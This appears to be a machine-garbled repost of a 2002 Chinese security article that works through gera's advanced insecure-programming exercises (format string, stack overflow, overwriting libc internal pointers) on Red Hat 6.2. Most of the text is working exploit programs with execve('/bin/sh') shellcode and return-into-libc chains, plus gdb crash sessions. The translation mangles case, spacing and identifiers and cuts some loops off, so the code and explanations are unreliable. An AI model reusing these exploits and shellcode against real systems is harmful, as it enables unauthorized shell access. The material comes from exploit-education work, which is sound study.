2. Tech
  3. [Analysis] Advanced Puppet of Non-Secure Programming Demonstration

[Analysis] Advanced Puppet of Non-Secure Programming Demonstration

xiaoxiao2021-03-06  18

Advanced

Creation time: 2002-01-17 Article properties: Original article Source: http://www.xfocus.org/ Article Submit: Alert7 (Sztcww_at_sina.com) Non-secure programming predecessor BY ALERT7 Home page: http://www.xfocus.org/ http://www.whitecell.org/ Company: Huatai Net An Time: 2002-1-17 ★ ★ Three advanced article test Environment Redhat 6.2 Glibc 2.1.3 ★ 3.1 Demonstration One / * E1.c * / * specially crafted to feed your brain by gera@core-sdi.com * // * jumpy vfprintf, batman! * / Int Main (int Argv, char ** argc) {/ * can you do it changing the stack? * / / * can you do it without Changing it? * / printf (argc [1]); while (1);} Refer to the << Using the formatted string overlay * printf () series function itself return address >> ★ 3.2 demonstration 2 / * e2.c * / * specially crafted to feed you brain by gera@core-sdi.com * // * Now, Your Misson Is To Make Abo1 Act Like This Other Program: * Char BUF [100]; While (1) {Scanf ("% 100S", BUF); System (BUF);} * but, you cannot Execute Code In stack. * / int main (int Ar gv, char ** argc) {char, argc [1]);} The only condition that needs to meet is that Stack is unable to run.

[Alert7 @ redhat62 alert7] $ ./e2 `perl -e 'print" a "x264'`Segmentation fault (core dumped) [alert7 @ redhat62 alert7] $ gdb e2 core -qCore was generated by` ./e2 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'. Program terminated with signal 11, segmentation fault.reading symbols from /lib/libc.so.6...done.reading symbols from /lib/ld-linux.so.2...done.#0 0x61616161 in ?? ) / * exp12.c * alert7 Exploit for e2 * / # include #define ret_position 260 # define nop 0x90 # define bufaddr 0xbffff968 # define system 0x4005ae0char shell [] = "/ bin / sh"; / *. String / "/ bin / sh /" * / int main (int Argc, char ** argv) {charff [1024], * PTR; int Retdr; INT i; retraddr = system; if (argc> 1) retraddr = SYSTEM ATOI (Argv [1]); BZERO (BUFF, 1024); for (i = 0; i <300; i ) BUFF [I] = NOP; * ((long *) & (buff [RET_POSITION-4] )) = BUFADDR 4 * 3 Strlen (shell); * Long *) & (buff [RET_POSITION]) = retradd; * ((long *) & (buff [RET_POSITION 4])) = 0xAabbccdd; // When system returns EIP * ((long *) & (BUFF) [RET_POSITION 8])) = BUFADDR RET_POSITION 4 * 3; PTR = BUFF RET_POSITION 12; STRCPY (PTR, Shell); Printf ("jump to 0x% 08x / n", retradd); Execl (". / E2 "," e2 ", buff, 0);} [alert7 @ redhat] $ gcc -o exp_e2 exp_e2.c [alert7 @ redhat] $ ./exp_e2jump to 0x4005ae0bash $ IDUID = 501 (Alert7) GID = 501 (Alert7 ) Groups = 501 (Alert7) Bash $ exiteXitsEGmentation Fault (Core Dumped) Memory Growth Direction ------>

| xxxxxx | EBP | EIP | EIP1 | Parameter Pointer | / BIN / SH || 260 BYtes | | | | -> Main LED ESP, EBP Value is EBPEIP1 to return the address after the system call (of course, if System returns) Parameter pointer points to / bin / SH Here we make EIP1 is 0xAabbccdd, so / bin / sh is returned to 0xAabbcdd CoreDUMP. That is to say, as long as we carefully constructor, you can construct a function call chain. For example, we need to call setuid (0) -> system ("/ bin / sh") -> EXIT (0); this Exploit can be successful, largely because the address of the system does not include 0, that is, Stack is not executable patch There is no Library library MMAP to memory low.

More Before Yourself Reference: << Way Wave Linux Unrequent Stack Protection Analysis >> by Waring3 and the "The Advanced Return-Into-Lib" with the recent P58 ( c) Exploits >> by Nergal ★ 3.3 Demo three / * E3.c ** specially crafted to feed your brey by gera@core-sdi.com * /// * Are you an enviromental Threat * / char buf [256]; int main (int Argv, char ** arg) {structure (buf, argc [1]); setENV ("ABO", Argc [2], 1); while (1);} [Alert7 @ redhat] $ uname -alinux redhat 2.2.14-5.0 # 1 Tue Mar 7 21:07:39 EST 2000 i686 unknown [Alert7 @ redhat] $ gcc -o e3 e3.c -static // Static compile There will be such a situation [alert7 @ redhat] $ ./e3 `perl -e 'print" a "x267'` ASEGMentation Fault (Core Dumped) [Alert7 @ redhat] $ GDB E3 Core -qcore Was generated by `/ e3 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.Program terminated with signal 11, Segmentation fault. # 0 0x616161 in ?? () (gdb) quit [alert7 @ redhat] $ ./e3 `perl -e 'print" a "x268'` aSegmentation fault (core DU mped) [alert7 @ redhat] $ gdb e3 core -qCore was generated by `./e3 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.Program terminated with signal 11, Segmentation fault. # 0 0x61616161 in ?? () (gdb) bt # 0 0x61616161 in ?? () # 1 0x804ac85 in __libc_realloc (oldmem = 0x0, Bytes = 88) at malloc.c: 3209 # 2 0x804d18b in realoc_hook_ini (ptr = 0x0, SZ = 88, Caller = 0x804857c) at malloc.c: 1770 # 3 0x804abb3 in __libc_realloc (OldMem = 0x0, Bytes = 88) At malloc.c: 3196 # 4 0x804857c in __add_to_environ (name = 0x80718e8 "ABO", value =

0xBffFFCC8 "A", Combined = 0x0, Replace = 1) at ../sysdeps/generic/setenv.c:145#5 0x804882b in __setenv (name = 0x80718e8 "ABO", value = 0xBffFFFCC8 "a", replace = 1) At ../sysdeps/generic/setenv.c:263#6 0x80481ce in main () # 7 0x804831b in __libc_start_main (main = 0x80481a0

, argc = 3, argv = 0xBfffb24, init = 0x80480b4 <_init>, fini = 0x80718ac <_fini>, rtld_fini = 0, stack_end = 0xbffffb1c) at ../sysdeps/generic/libc-start.c:92 According to the above conditions, we can completely do not have to pay attention to what the SETENV () has happened. It is only necessary to know a value in the BUF 264, this value will become EIP.

/ * Exp_e3.c * alert7 exploit for static e3 * / # include #define RET_POSITION 264 # define NOP 0x90 # define BUFADDR 0x807bf60 // 0xaabbccddchar shellcode [] = "/ xeb / x1f" / * jmp 0x1f * / "/ X5e" / * popl% ESI * / "/ x89 / x76 / x08" / * movl% ESI, 0x8 (% ESI) * / "/ x31 / xc0" / * xorl% EAX,% EAX * / " / x88 / x46 / x07 "/ * MOVB% EAX, 0x7 (% ESI) * /" / x89 / x46 / x0c "/ * movl% EAX, 0xc (% ESI) * /" / xb0 / x0b "/ * MOVB $ 0XB,% Al * / "/ x89 / xf3" / * movl% ESI,% EBX * / "/ x8d / x4e / x08" / * LEAL 0x8 (% ESI),% ECX * / "/ X8D / X56 / X0C "/ * LEAL 0XC (% ESI),% EDX * /" / XCD / X80 "/ * int $ 0x80 * /" / x31 / xdb "/ * xor L% EBX,% EBX * / "/ x89 / xd8" / * movl% EBX,% EAX * / "/ x40" / * inc% EAX * / "/ XCD / X80" / * int $ 0x80 * / "/ XE8 / XDC / XFF / XFF / XFF "/ * CALL-0X24 * /" / bin / sh "; / * .string /" / bin / sh / "* / int main (int Argc, char ** argv) { CHAR BUFF [1024], * PTR; int Retdr; INT i; retraddr = bufaddr; if (argc> 1) Retaddr = bufaddr atoi (argv [1]); Bzero (BUFF, 1024); for (i = 0; I <1024;

i = 4) * ((long *) & (buff [i])) = Retaddr; for (i = 0; i <100; i ) BUFF [i] = NOP; PTR = BUFF 50; for (i = 0; i

Tracking long time and found or static compiler __libc_malloc () problem 0x8049ff5 <__ libc_malloc 89>: mov 0x807c068,% eax0x8049ffa <__ libc_malloc 94>: test% eax,% eax0x8049ffc <__ libc_malloc 96>: je 0x804a010 <__ libc_malloc 116> 0x8049ffe <__ libc_malloc 98>: push $ 0x00x804a000 <__ libc_malloc 100>: call *% eax (gdb) i reg eaxeax 0x61616161 1633771873 (gdb) x 0x807c0680x807c068 <__ libc_internal_tsd_get>: 0x61616161 (gdb) p & __libc_internal_tsd_get $ 1 = (void * (**) ()) 0x807c068 (gdb) p __libc_internal_tsd_get $ 2 = (void * (*) ()) 0x61616161 our data coverage to the __libc_internal_tsd_get () function address, the __libc_internal_tsd_get () point to 0x61616161. Segmentation fault is not so Know __libc_internal_tsd_get () What is the role here? I don't know, depressed ~ ★ 3.4 demonstration four / * e4.c ** specially crafted to feed your brain by gera@core-sdi.com * // *% What the hell? * / Char buf [256]; INT main (int Argv, char ** arg) {structure (buf, argc [1]); Printf ("Live AT 100%!"); while (1);} [alert7 @ redhat] $ GCC -O E4 E4 .c -static // static compile time will only appear [Alert7 @ redhat] $ ./e4 `perl -e 'print" a "x1408'`/e4` perl -e 'print "a" x1409'`Segmentation fault (core dumped) [alert7 @ redhat] $ gdb -q e4 coreCore was generated by `./e4 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.Program terminated with signal 11, Segmentation fault. # 0 0x61616161 in ?? () (GDB) BT # 0 0x61616161 in ?? () # 1 0x8048681 in printf (Format = 0x8071548 "Live AT 100%!"

) At printf.c: 31 # 2 0x80481c3 in main () # 3 0x804831b in __libc_start_main (main = 0x80481a0

, argc = 2, argv = 0xbffff6a4, init = 0x80480b4 <_init>, fini = 0x807150c <_fini>, rtld_fini = 0, stack_end = 0xbfffff69c) at ../sysdeps/generic/libc-start.c:92[Rert7@redhat62 alert7] $ ./e4 `perl -e 'print" a "x518'`perl -e' print "b" x891'`Segmentation fault (core dumped) [alert7 @ redhat62 alert7] $ gdb e4 core -q Core was generated by `./e4 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.Program terminated with signal 11, Segmentation fault. # 0 0x62626161 in ?? () [Alert7 @ redhat62 alert7] $ ./e4 `perl -e 'print" a "x516'`perl -e' print" b "x893'`segmentation fault (core dumped) [alert7 @ redhat62 alert7] $ gdb e4 core -q Core was generated by `./e4 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.Program terminated with signal 11, Segmentation fault. # 0 0x62626262 in ?? () according to The above conditions, we can completely do not have to pay for what happens inside the Printf (). Just know that in the BUF 516 place is placed in a value, this value will become EIP.

/ * Exp_e4.c * alert7 exploit for static e4 * / # include #define RET_POSITION 516 # define NOP 0x90 # define BUFADDR 0x807bbc0 // 0xaabbccddchar shellcode [] = "/ xeb / x1f" / * jmp 0x1f * / "/ X5e" / * popl% ESI * / "/ x89 / x76 / x08" / * movl% ESI, 0x8 (% ESI) * / "/ x31 / xc0" / * xorl% EAX,% EAX * / " / x88 / x46 / x07 "/ * MOVB% EAX, 0x7 (% ESI) * /" / x89 / x46 / x0c "/ * movl% EAX, 0xc (% ESI) * /" / xb0 / x0b "/ * MOVB $ 0XB,% Al * / "/ x89 / xf3" / * movl% ESI,% EBX * / "/ x8d / x4e / x08" / * LEAL 0x8 (% ESI),% ECX * / "/ X8D / X56 / X0C "/ * LEAL 0XC (% ESI),% EDX * /" / XCD / X80 "/ * int $ 0x80 * /" / x31 / xdb "/ * XO RL% EBX,% EBX * / "/ x89 / xd8" / * movl% EBX,% EAX * / "/ X40" / * inc% eax * / "/ xcd / x80" / * int $ 0x80 * / "/ XE8 / XDC / XFF / XFF / XFF "/ * CALL-0X24 * /" / bin / sh "; / * .string /" / bin / sh / "* / int main (int Argc, char ** argv) { CHAR BUFF [2048], * PTR; INT RETDR; INT I; Retdr = BUFADDR; IF (Argc> 1) Retaddr = BUFADDR ATOI (Argv [1]); BZERO (BUFF, 2048); for (i = 0; i <2000; i

) BUFF [I] = NOP; * ((long *) & (buff [RET_POSITION])) = Retaddr; PTR = Buff 50; for (i = 0; I : mov 0x807bd40 (,% edx, 4),% edx0x8050108 <_IO_vfprintf 9368>: test% edx,% edx // case edx = 0x626262620x805010a <_IO_vfprintf 9370>: je 0x8050130 <_IO_vfprintf 9408> 0x805010c <_IO_vfprintf 9372>: add $ 0x28,% eax0x805010f <_IO_vfprintf 9375>: push% eax0x8050110 <_IO_vfprintf 9376>: push $ 0x10x8050112 <_IO_vfprintf 9378>: mov 0xfffffab4 (% ebp),% ecx0x8050118 <_IO_vfprintf 9384>: push% ecx0x8050119 <_IO_vfprintf 9385>: call *% edx // problem here (gdb) x 0x807bd400x807bd40 <__ printf_arginfo_table>: 0x61616161 long as printf ( "% X") ;, X is the Printf knows that it is not a custom format, which will use the __printf_arginfo_table to call the corresponding function to explain the format, and the __printf_arginfo_table array is overwritten by our data, so we can get control. This is my rough understanding, and the specific analysis of the execution process of the PrintF function needs to be detailed. If you are wrong, please ask the ax.

★ 3.5 Demo 5 / * E5.C ** specially crafted to feed your brengu by gera@core-sdi.com * /// * is this possible? * / Char buf [256]; int main (int Argv, char ** Arg) {structure (buf, argc [1]); PERROR (Argc [2]); while (1);} Static compile (GDB) P & BUF $ 1 = ( *) 0x807bc00 [ Alert7 @ redhat] $ gcc -o e5 e5.c -static [alert7 @ redhat] $ ./e5 `perl -e 'print" a "x255'` AA: Success [alert7 @ redhat] $ ./e5` perl - e 'print "a" x256'` aSegmentation fault (core dumped) [alert7 @ redhat] $ gdb e5 core -qCore was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.Program terminated with signal 11, Segmentation fault. # 0 chunk_alloc (ar_ptr = 0x807a000, nb = 48) at malloc.c: 27622762 malloc.c: no sudh file or directory. (Gdb) bt # 0 chun_alloc (ar_ptr = 0x807a000, nb = 48) at malloc.c: 2762 # 1 0x8049cf4 in __libc_malloc (bytes = 44) at malloc.c: 2696 # 2 0x804e74a in _NL_MAKE_L10NFLIST (L10 nfile_list = 0x807b434, dirlist = 0x8071795 "/ usr / share / locale", dirlist_len = 18, mask = 0, language = 0xbffff628 "en_US", territory = 0x0, codeset = 0x0, normalized_codeset = 0x0, modifier = 0x0, special = 0x0 , sponsor = 0x0, revision = 0x0, filename = 0xbffff630 "LC_MESSAGES / libc.mo", do_allocate = 0) at l10nflist.c: 201 # 3 0x804dd30 in _nl_find_domain (dirname = 0x8071795 "/ usr / share / locale", locale = 0xBffFf628 "en_us", DomainName = 0xBffff630 "lc_messages / libc.mo") at FindDomain.c: 113 # 4 0x804d8b0 in __dcgettext (domainname =

0x8071786 "libc", msgid = 0x80727d4 "success", category = 5) At dcgetText.c: 395 # 5 0x804d06d in __strerror_r (errnum = 0, buf = 0xBffffff6cc ", buflen = 1024) at ../sysdeps/Generic/ _STRERROR.C: 68 # 6 0x80486ae in perror (s = 0xBfffFFFCC8 "a") AT PERROR.C: 38 # 7 0x80481c7 in main () # 8 0x804831b in __libc_start_main (main = 0x80481a0

, argc = 3, argv = 0xBffffb24, init = 0x80480b4 <_init>, fini = 0x807155c <_fini>, rtld_fini = 0, stack_end = 0xBffffb1c) at ../sysdeps/generic/libc-start.c:92(gdb )[Alert7@redhat]/ e5 `perl -e 'print" a "x257'` aSegmentation fault (core dumped) [alert7 @ redhat] $ gdb e5 core -qCore was generated by` ./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.Program terminated with signal 11, Segmentation fault. # 0 chunk_alloc (ar_ptr = 0x8070061, nb = 48) at malloc.c: 27622762 malloc.c: No sudh file or directory. (Gdb) quit [alert7 @ redhat] $ ./e5 `perl -e 'print" a "x258 '`asegmentation fault (core dumped) [alert7 @ redhat] $ gdb e5 core -qcore was generated by` /e5 a aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.Program terminated with signal 11, Segmentation fault # 0 chunk_alloc (ar_ptr = 0x8006161, nb = 48) at malloc.c:. 27522752 malloc.c: No such file or directory (gdb) quit [alert7 @ redhat] $. ./e5 `perl -e 'print" a "x259'` aSegmentation fault (core dumped) [alert7 @ redhat] $ gdb e5 core -qCore was generated by` ./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'

.Program terminated with signal 11, segmentation fault. # 0 chunk_alloc (ar_ptr = 0x616161, nb = 48) at malloc.c: 27522752 malloc.c: no such file or directory. (Gdb) quit [alert7 @ redhat] $ ./ e5 `perl -e 'print" a "x260'` aSegmentation fault (core dumped) [alert7 @ redhat] $ gdb e5 core -qCore was generated by` ./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.Program terminated with signal 11, Segmentation fault. # 0 chunk_alloc (ar_ptr = 0x61616161, nb = 48) at malloc.c: 27522752 malloc.c: no such file or directory ../ E5 `Perl -e 'print" a "x260'` A ---./e5` Perl -e 'print "a" x264'` A is all above [Alert7 @ redhat] $ ./e5 `perl -e' print" a "x265'` ASEGMentation Fault (Core Dumped) [Alert7 @ redhat] $ gdb e5 core -qCore was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.Program terminated with signal 11, Segmentation fault. # 0 0x61 in ?? () (gdb) quit [alert7 @ redhat] $ ./e5` perl -e 'Print "a" x266'` ASEGMENTATION FAULT (Core Dumped) [Alert 7 @ redhat] $ gdb e5 core -qCore was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.Program terminated with signal 11, Segmentation fault. # 0 0x6161 in ?? () (gdb) quit [alert7 @ redhat] $ ./e5 `perl -e 'print" a "x267'` aSegmentation fault (core dumped) [alert7 @ redhat] $ gdb e5 core -qCore was generated by` ./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.Program terminated with signal 11, Segmentation fault. # 0 0x616161 in ?? () (gdb) quit [alert7 @

redhat] $ ./e5 `perl -e 'print" a "x268'` aSegmentation fault (core dumped) [alert7 @ redhat] $ gdb e5 core -qCore was generated by` ./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.Program terminated with signal 11 , Segmentation fault. # 0 0x61616161 in ?? () (gdb) bt # 0 0x61616161 in ?? () # 1 0x804e74a in _nl_make_l10nflist (l10nfile_list = 0x807b434, dirlist = 0x8071795 "/ usr / share / locale", dirlist_len = 18, mask = 0, language = 0xbffff628 "en_US", territory = 0x0, codeset = 0x0, normalized_codeset = 0x0, modifier = 0x0, special = 0x0, sponsor = 0x0, revision = 0x0, filename = 0xbffff630 "LC_MESSAGES / libc.mo", do_allocate = 0) at l10nflist.c: 201 # 2 0x804dd30 in _nl_find_domain (dirname = 0x8071795 "/ usr / share / locale", locale = 0xbffff628 "en_US", domainname = 0xbffff630 "LC_MESSAGES / libc.mo") at finddomain.c : 113 # 3 0x804d8b0 in __dcgettext (domainname = 0x8071786 "libc", msgid = 0x80727d4 "Success", category = 5) at dcgettext.c: 395 # 4 0x804d06d in __strerror_r (errnum = 0, buf = 0xbffff6cc "", BUFLEN = 1024) at ../sysdeps/generic/_strerror.c:68#5 0x80486ae in perror (s = 0xBfffFFCC8 "a") AT PERROR.C: 38 # 6 0x80481c7 in main () # 7 0x804831b in __libc_start_main (main = 0x80481A0

, argc = 3, argv = 0xBfffffb24, init = 0x80480b4 <_init>, fini = 0x807155c <_fini>, rtld_fini = 0, stack_end = 0xBfffb1c) at ../sysdeps/Generic/libc-start.c: 92./e5 `perl -e 'print" a "x268'` A ---./e5` perl -e' print "a" x364'` A is all [alert7 @ redhat] $ ./e5`

perl -e 'print "a" x365'` aSegmentation fault (core dumped) [alert7 @ redhat] $ gdb e5 core -qCore was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.Program terminated with signal 11, Segmentation fault. # 0 0x804d683 in __dcgettext (domainname = 0x8071786 "libc", msgid = 0x80727d4 "Success", category = 5) at dcgettext.c: 282282 dcgettext.c: No such file or directory (gdb) x / i 0x804d6830x804d683 <__ dcgettext 67>.: Pushl 0x4 (% EAX) (GDB) I REG EAXEAX 0x61 97 (GDB) Quit [Alert7 @ redhat] $ ./e5 `perl -e 'print" a "x368'` A // This is old SEGMENTATION FAULT (core dumped) [alert7 @ redhat] $ gdb e5 core -qCore was generated by `./e5 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.Program terminated with signal 11, Segmentation fault. # 0 0x804d683 in __dcgettext (domainname = 0x8071786" libc ", msgid = 0x80727d4 "Success", category = 5) at dcgettext.c: 282282 dcgettext.c: no such file or directory. (GDB) x / i 0x804d6830x804d683 <__ dcgettext 67>: pushl 0x4 (% eax) (gdb) i reg eaxeax 0x61616161 1633771873 (gdb) bt # 0 0x804d683 in __dcgettext (domainname = 0x8071786 "libc", msgid = 0x80727d4 "Success", category = 5) at dcgettext .c: 282 # 1 0x804d06d in __strerror_r (errnum = 0, buf = 0xBfffff65c ", bufler = 1024) at ../sysdeps/generic/_strerror.c:68#2 0x80486ae in perror (s = 0xBffffcc8" a ") AT Perror.c: 38 # 3 0x80481c7 in main () # 4 0x804831b in __libc_start_main (main = 0x80481a0

, argc = 3, argv = 0xBfffAb4, init = 0x80480b4 <

_INIT>, FINI = 0x807155c <_fini>, rtld_fini = 0, stack_end = 0xBffffaac) at ../sysdeps/generic/libc-start.c:92argv[1] Length limit in 268 ---- 364BUFF 264 place is eip / * exp_e5.c * alert7 exploit for static e5 * / # include #define RET_POSITION 264 # define NOP 0x90 # define BUFADDR 0x807bc00 // 0xaabbccddchar shellcode [] = "/ xeb / x1f" / * jmp 0x1f * / "/ X5e" / * popl% ESI * / "/ x89 / x76 / x08" / * movl% ESI, 0x8 (% ESI) * / "x31 / xc0" / * xorl% EAX,% EAX * / "/ x88 / x46 / x07" / * MOVB% EAX, 0x7 (% ESI) * / "/ x89 / x46 / x0c" / * movl% EAX, 0xc (% ESI) * / "/ xb0 / x0b" / * MOVB $ 0XB,% Al * / "/ x89 / xf3" / * movl% ESI,% EBX * / "/ x8d / x4e / x08" / * leal 0x8 (% ESI),% ECX * / "/ X8D / X56 / X0C " / * LEAL 0XC (% ESI),% EDX * / "/ XCD / X80" / * int $ 0x80 * / "/ x31 / xdb" / * xorl% EBX,% EBX * / "/ x89 / xd8" / * MOVL% EBX,% EAX * / "/ x40" / * inc% eax * / "/ xcd / x80" / * int $ 0x80 * / "/ xe8 / xdc / xff / xff / xff" / * call -0x24 * / "/ Bin / sh"; / * .string / "/ bin / sh /" * / int main (int Argc, char ** argv) {charff [300], * PTR;

转载请注明原文地址:https://www.9cbs.com/read-41122.html

9cbs

New Post(0)